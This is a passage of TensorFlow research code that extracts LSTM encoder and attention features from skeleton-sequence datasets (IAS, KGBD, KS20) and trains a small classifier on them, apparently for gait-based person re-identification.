[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_2_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_2_X.append(c_vec)
else:
t_2_X.extend(att_op.tolist())
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_2_X.append(f_o)
else:
t_2_X.extend(f_o.tolist())
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_2_X.extend(c_vec)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_2_y.extend([k] * (batch_size - flag))
# t_2_C_y.extend([k] * (batch_size - flag))
else:
t_2_y.extend([k] * (batch_size - flag) * time_steps)
X_1 = np.array(X)
y_1 = np.array(y)
X_pred_1 = np.array(X_pred)
t_X_pred_1 = np.array(t_X_pred)
ids_keys = sorted(list(ids.keys()))
t_ids_keys = sorted(list(t_ids.keys()))
classes = [i for i in ids_keys]
t_classes = [i for i in t_ids_keys]
t_y = label_binarize(t_y, classes=t_classes)
if dataset == 'IAS':
t_2_ids_keys = sorted(list(t_2_ids.keys()))
t_2_classes = [i for i in t_2_ids_keys]
t_2_y = label_binarize(t_2_y, classes=t_2_classes)
t_2_y_1 = t_2_y
t_2_X_1 = t_2_X
t_y = np.array(t_y)
if C_reid == '1':
t_C_X = np.array(t_C_X)
else:
t_X = np.array(t_X)
t_y_1 = t_y
t_X_1 = t_X
# checkpoint 2
_targets = copy.deepcopy(_input_data)
for i in range(_input_data.shape[0]):
permutation_ = np.random.permutation(time_steps)
_input_data[i] = _input_data[i, permutation_]
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint_2 + '.meta')
loader.restore(sess, checkpoint)
input_data = loaded_graph.get_tensor_by_name('inputs:0')
targets = loaded_graph.get_tensor_by_name('targets:0')
if Frozen == '1':
contrast_v = loaded_graph.get_tensor_by_name('add_16:0')
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
C_input = loaded_graph.get_tensor_by_name('C_inptuiut:0')
else:
contrast_v = loaded_graph.get_tensor_by_name("add_2:0")
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
if Bi_LSTM:
encoder_output = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_6:0')
encoder_output_bw = loaded_graph.get_tensor_by_name('ReverseSequence: 0')
encoder_c_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_3:0')
encoder_h_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_4:0')
encoder_c_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_5:0')
encoder_h_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
else:
encoder_output = loaded_graph.get_tensor_by_name('rnn/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('rnn/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('rnn/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
# train_output = loaded_graph.get_tensor_by_name('train_output:0')
if use_attention:
alignment_history = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
# train_attention_matrix = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
attention_state = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_12:0')
attention_weights = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_8:0')
alignment = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_10:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')
source_sequence_length = loaded_graph.get_tensor_by_name('source_sequence_length:0')
target_sequence_length = loaded_graph.get_tensor_by_name('target_sequence_length:0')
X = []
C_X = []
X_all_op = []
X_final_op = []
X_final_c = []
X_final_h = []
X_final_c1 = []
X_final_h1 = []
X_final_ch = []
X_final_ch1 = []
y = []
C_y = []
X_pred = []
t_X = []
t_C_X = []
t_y = []
t_C_y = []
t_2_X = []
t_2_C_X = []
t_2_y = []
t_2_C_y = []
t_X_pred = []
t_X_att = []
# print(t_ids)
# print(test_attention)
ids_ = sorted(ids.items(), key=lambda item:item[0])
t_ids_ = sorted(t_ids.items(), key=lambda item: item[0])
if dataset == 'IAS':
t_2_ids_ = sorted(t_2_ids.items(), key=lambda item: item[0])
# print(ids_)
# exit(1)
for k, v in ids_:
if len(v) == 0:
print(k)
continue
if len(v) < batch_size:
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = _input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = _targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'c':
X.append(t2)
elif type == 'ch':
t3.extend(t2)
X.append(t3)
elif type == 'o':
X.append(t1)
elif type == 'oc':
t1.extend(t2)
X.append(t1)
elif type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
X.append(att_op)
else:
att_batch.append(att_op)
# else:
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# X.append(c_vec)
else:
X.extend(att_op.tolist())
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# # if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# att_batch.append(att_op)
# att_batch = np.array(att_batch)
# _, c_loss, c_vec = sess.run([C_train_op, C_loss, contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o + f_o_bw
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
X.append(f_o)
else:
X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'c':
# X_pred.append(t2)
# elif type == 'ch':
# t3.extend(t2)
# X_pred.append(t3)
# elif type == 'o':
# X_pred.append(t1)
# elif type == 'oc':
# t1.extend(t2)
# X_pred.append(t1)
# elif type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# X_pred.append(att_op)
# else:
# X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# # if Bi_LSTM:
# # f_o_bw = encoder_outputs_bw[index, :, :]
# # f_o = f_o + f_o_bw
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# X_pred.append(f_o)
# else:
# X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
y.extend([k] * batch_size)
# C_y.extend([k] * batch_size)
else:
y.extend([k] * batch_size * time_steps)
# exit(1)
for k, v in t_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X.append(att_op)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_X.append(c_vec)
else:
t_X.extend(att_op.tolist())
t_X_att.append(weights)
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_X.append(f_o)
else:
t_X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
t_X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X_pred.append(att_op)
# else:
# t_X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# t_X_pred.append(f_o)
# else:
# t_X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# t_X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_y.extend([k] * (batch_size - flag))
# t_C_y.extend([k] * (batch_size - flag))
else:
t_y.extend([k] * (batch_size - flag) * time_steps)
if dataset == 'IAS':
for k, v in t_2_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_2_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_2_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_2_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_2_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_2_X.append(c_vec)
else:
t_2_X.extend(att_op.tolist())
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_2_X.append(f_o)
else:
t_2_X.extend(f_o.tolist())
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_2_X.extend(c_vec)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_2_y.extend([k] * (batch_size - flag))
# t_2_C_y.extend([k] * (batch_size - flag))
else:
t_2_y.extend([k] * (batch_size - flag) * time_steps)
X_2 = np.array(X)
y_2 = np.array(y)
X_pred_2 = np.array(X_pred)
t_X_pred_2 = np.array(t_X_pred)
ids_keys = sorted(list(ids.keys()))
t_ids_keys = sorted(list(t_ids.keys()))
classes = [i for i in ids_keys]
t_classes = [i for i in t_ids_keys]
t_y = label_binarize(t_y, classes=t_classes)
if dataset == 'IAS':
t_2_ids_keys = sorted(list(t_2_ids.keys()))
t_2_classes = [i for i in t_2_ids_keys]
t_2_y = label_binarize(t_2_y, classes=t_2_classes)
t_2_y_2 = t_2_y
t_2_X_2 = t_2_X
t_y = np.array(t_y)
if C_reid == '1':
t_C_X = np.array(t_C_X)
else:
t_X = np.array(t_X)
t_y_2 = t_y
t_X_2 = t_X
# preds = np.array(preds)
# preditions = np.array(preditions)
global permutation, permutation_flag, permutation_test_flag, permutation_test_2_flag, test_permutation, test_2_permutation
if not permutation_flag:
if C_reid == '1':
permutation = np.random.permutation(C_X.shape[0])
else:
permutation = np.random.permutation(X_0.shape[0])
permutation_flag = True
# useless C_X
if C_reid == '1':
C_X = C_X[permutation, ]
else:
X_0 = X_0[permutation, ]
if Model == 'rev_rec_plus':
X_1 = X_1[permutation,]
X_2 = X_2[permutation,]
y_0 = y_0[permutation, ]
if Model == 'rev_rec_plus':
y_1 = y_1[permutation,]
y_2 = y_2[permutation,]
# X_pred = X_pred[permutation, ]
if not permutation_test_flag:
if C_reid == '1':
test_permutation = np.random.permutation(t_C_X.shape[0])
else:
test_permutation = np.random.permutation(t_X_0.shape[0])
permutation_test_flag = True
if manner == 'sc':
if C_reid == '1':
t_C_X = t_C_X[test_permutation, ]
else:
t_X_0 = t_X_0[test_permutation,]
if Model == 'rev_rec_plus':
t_X_1 = t_X_1[test_permutation,]
t_X_2 = t_X_2[test_permutation,]
t_y_0 = t_y_0[test_permutation,]
if Model == 'rev_rec_plus':
t_y_1 = t_y_1[test_permutation,]
t_y_2 = t_y_2[test_permutation,]
# t_X_att = t_X_att[test_permutation]
if dataset == 'IAS':
# valid_2_source = t_2_X
# valid_2_target = t_2_y
if C_reid == '1':
t_2_C_X = np.array(t_2_C_X)
t_2_C_y = np.array(t_2_C_y)
else:
t_2_X_0 = np.array(t_2_X_0)
t_2_y_0 = np.array(t_2_y_0)
if Model == 'rev_rec_plus':
t_2_X_1 = np.array(t_2_X_1)
t_2_y_1 = np.array(t_2_y_1)
t_2_X_2 = np.array(t_2_X_2)
t_2_y_2 = np.array(t_2_y_2)
if not permutation_test_2_flag:
if C_reid == '1':
test_2_permutation = np.random.permutation(t_2_C_X.shape[0])
else:
test_2_permutation = np.random.permutation(t_2_X_0.shape[0])
permutation_test_2_flag = True
if manner == 'sc':
if C_reid == '1':
t_2_C_X = t_2_C_X[test_2_permutation,]
else:
t_2_X_0 = t_2_X_0[test_2_permutation,]
if Model == 'rev_rec_plus':
t_2_X_1 = t_2_X_1[test_2_permutation,]
t_2_X_2 = t_2_X_2[test_2_permutation,]
t_2_y_0 = t_2_y_0[test_2_permutation,]
if Model == 'rev_rec_plus':
t_2_y_1 = t_2_y_1[test_2_permutation,]
t_2_y_2 = t_2_y_2[test_2_permutation,]
# print(X_0.shape, t_X_0.shape)
# exit(0)
if Model == 'rev_rec_plus':
X = np.concatenate((X_0, X_1, X_2), axis=1)
t_X = np.concatenate((t_X_0, t_X_1, t_X_2), axis=1)
else:
X = X_0
t_X = t_X_0
y = y_0
t_y = t_y_0
if dataset == 'IAS':
if Model == 'rev_rec_plus':
t_2_X = np.concatenate((t_2_X_0, t_2_X_1, t_2_X_2), axis=1)
else:
t_2_X = t_2_X_0
t_2_y = t_2_y_0
if C_reid == '1':
return C_X, y, t_C_X, t_y, t_2_C_X, t_2_y, t_X_att
else:
return X, y, t_X, t_y, t_2_X, t_2_y, t_X_att
else:
if C_reid == '1':
return C_X, y, t_C_X, t_y, t_X_att
else:
return X, y, t_X, t_y, t_X_att
def get_new_train_batches(targets, sources, batch_size):
if len(targets) < batch_size:
yield targets, sources
else:
for batch_i in range(0, len(sources) // batch_size):
start_i = batch_i * batch_size
sources_batch = sources[start_i:start_i + batch_size]
targets_batch = targets[start_i:start_i + batch_size]
yield targets_batch, sources_batch
def encoder_classify_union_directly(X, y, t_X, t_y, new_dir, ps, dataset):
global epochs, attention, manner, view
epochs = 300
if dataset == 'KGBD':
epochs = 200
if dataset == 'KS20':
epochs = 800
try:
os.mkdir(new_dir)
except:
pass
if view != '':
view_dir = view + '/'
else:
view_dir = ''
from sklearn.preprocessing import label_binarize
if dataset == 'IAS':
dataset = 'IAS'
ids = np.load('Datasets/' + frames_ps + view_dir + dataset + '_train_npy_data/ids_' + dataset + '_' + str(time_steps) + '.npy')
ids = ids.item()
t_ids = np.load('Datasets/' + frames_ps + view_dir + dataset + '_test_npy_data/ids_' + dataset + '_' + str(time_steps) + '.npy')
t_ids = t_ids.item()
ids_keys = sorted(list(ids.keys()))
classes = [i for i in ids_keys]
y = label_binarize(y, classes=classes)
t_ids_keys = sorted(list(t_ids.keys()))
classes = [i for i in t_ids_keys]
t_y = label_binarize(t_y, classes=classes)
train_source = X
train_target = y
valid_source = t_X
valid_target = t_y
if Model == 'rev_rec_plus':
if manner == 'sc':
first_size = rnn_size * time_steps * 3 * 3
else:
first_size = rnn_size * 3 * 3
X_input = tf.placeholder(tf.float32, [None, first_size], name='X_input')
y_input = tf.placeholder(tf.int32, [None, len(classes)], name='y_input')
lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
Wx_plus_b1 = tf.matmul(X_input, W1) + b1
l1 = tf.nn.relu(Wx_plus_b1)
W = tf.Variable(tf.random_normal([rnn_size, len(classes)]), name='W')
b = tf.Variable(tf.zeros(shape=[len(classes), ], name='b'))
pred = tf.matmul(l1, W) + b
else:
if manner == 'sc':
first_size = rnn_size * time_steps * 3
else:
first_size = rnn_size * 3
X_input = tf.placeholder(tf.float32, [None, first_size], name='X_input')
y_input = tf.placeholder(tf.int32, [None, len(classes)], name='y_input')
lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
Wx_plus_b1 = tf.matmul(X_input, W1) + b1
l1 = tf.nn.relu(Wx_plus_b1)
W = tf.Variable(tf.random_normal([rnn_size, len(classes)]), name='W')
b = tf.Variable(tf.zeros(shape=[len(classes), ], name='b'))
pred = tf.matmul(l1, W) + b
with tf.name_scope("new_train"):
optimizer = tf.train.AdamOptimizer(learning_rate, name="Adam3")
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y_input))
gradients = optimizer.compute_gradients(cost)
capped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]
train_op = optimizer.minimize(cost)
correct_pred = tf.equal(tf.argmax(pred, 1),tf.argmax(y_input, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
def get_new_train_batches(targets, sources, batch_size):
for batch_i in range(0, len(sources) // batch_size):
start_i = batch_i * batch_size
sources_batch = sources[start_i:start_i + batch_size]
targets_batch = targets[start_i:start_i + batch_size]
yield targets_batch, sources_batch
init = tf.global_variables_initializer()
with tf.Session(config=config) as sess:
sess.run(init)
step = 0
train_loss = []
test_loss = []
accs = []
val_accs = [0]
max_acc = 0
saver = tf.train.Saver()
try:
os.mkdir(new_dir)
except:
pass
new_dir += '/' + ps
try:
os.mkdir(new_dir)
except:
pass
# if attention == 'BA':
# manner == 'sc'
for epoch_i in range(1, epochs + 1):
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(train_target, train_source, batch_size)):
_, loss, acc = sess.run([train_op, cost, accuracy],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
accs.append(acc)
if epoch_i % 1 == 0:
loss, train_acc = sess.run([cost, accuracy],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
val_loss = []
val_acc = []
flag = 0
if valid_source.shape[0] < batch_size:
flag = batch_size - valid_source.shape[0]
valid_source = valid_source.tolist()
valid_target = valid_target.tolist()
valid_source.extend([valid_source[0]] * flag)
valid_target.extend([valid_target[0]] * flag)
valid_source = np.array(valid_source)
valid_target = np.array(valid_target)
if manner == 'ap':
all_frame_preds = []
for k in range(valid_source.shape[0] // batch_size):
if manner == 'sc':
